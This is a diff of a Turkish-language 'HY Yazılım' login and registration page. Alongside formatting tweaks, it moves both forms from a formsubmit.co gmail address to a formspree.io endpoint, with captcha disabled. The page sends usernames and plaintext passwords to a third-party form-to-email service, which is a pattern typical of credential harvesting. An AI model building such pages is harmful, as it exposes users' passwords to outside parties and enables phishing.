--- a/index.html
+++ b/index.html
@@ -1,8 +1,8 @@
 <!DOCTYPE html>
 <html lang="tr">
 <head>
-  <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1" />
   <title>HY Yazılım - Giriş</title>
   <style>
     :root {
@@ -141,23 +141,23 @@
   <div class="container">
     <div class="card">
       <h2>Giriş Yap</h2>
-      <form action="https://formsubmit.co/HYYazilim@gmail.com" method="POST">
-        <input type="hidden" name="_template" value="table">
-        <input type="hidden" name="_captcha" value="false">
-        <input type="text" name="username" placeholder="Kullanıcı Adı" required>
-        <input type="password" name="password" placeholder="Şifre" required>
+      <form action="https://formspree.io/f/xgvybkwj" method="POST">
+        <input type="hidden" name="_template" value="table" />
+        <input type="hidden" name="_captcha" value="false" />
+        <input type="text" name="username" placeholder="Kullanıcı Adı" required />
+        <input type="password" name="password" placeholder="Şifre" required />
         <button type="submit">Giriş Yap</button>
       </form>
     </div>
 
     <div class="card">
       <h2>Kayıt Ol</h2>
-      <form action="https://formsubmit.co/HYYazilim@gmail.com" method="POST">
-        <input type="hidden" name="_template" value="table">
-        <input type="hidden" name="_captcha" value="false">
-        <input type="text" name="new_username" placeholder="Yeni Kullanıcı Adı" required>
-        <input type="email" name="email" placeholder="E-posta" required>
-        <input type="password" name="new_password" placeholder="Şifre" required>
+      <form action="https://formspree.io/f/xgvybkwj" method="POST">
+        <input type="hidden" name="_template" value="table" />
+        <input type="hidden" name="_captcha" value="false" />
+        <input type="text" name="new_username" placeholder="Yeni Kullanıcı Adı" required />
+        <input type="email" name="email" placeholder="E-posta" required />
+        <input type="password" name="new_password" placeholder="Şifre" required />
         <button type="submit">Kayıt Ol</button>
       </form>
     </div>
@@ -187,5 +187,6 @@
       }
     };
   </script>
+
 </body>
 </html>
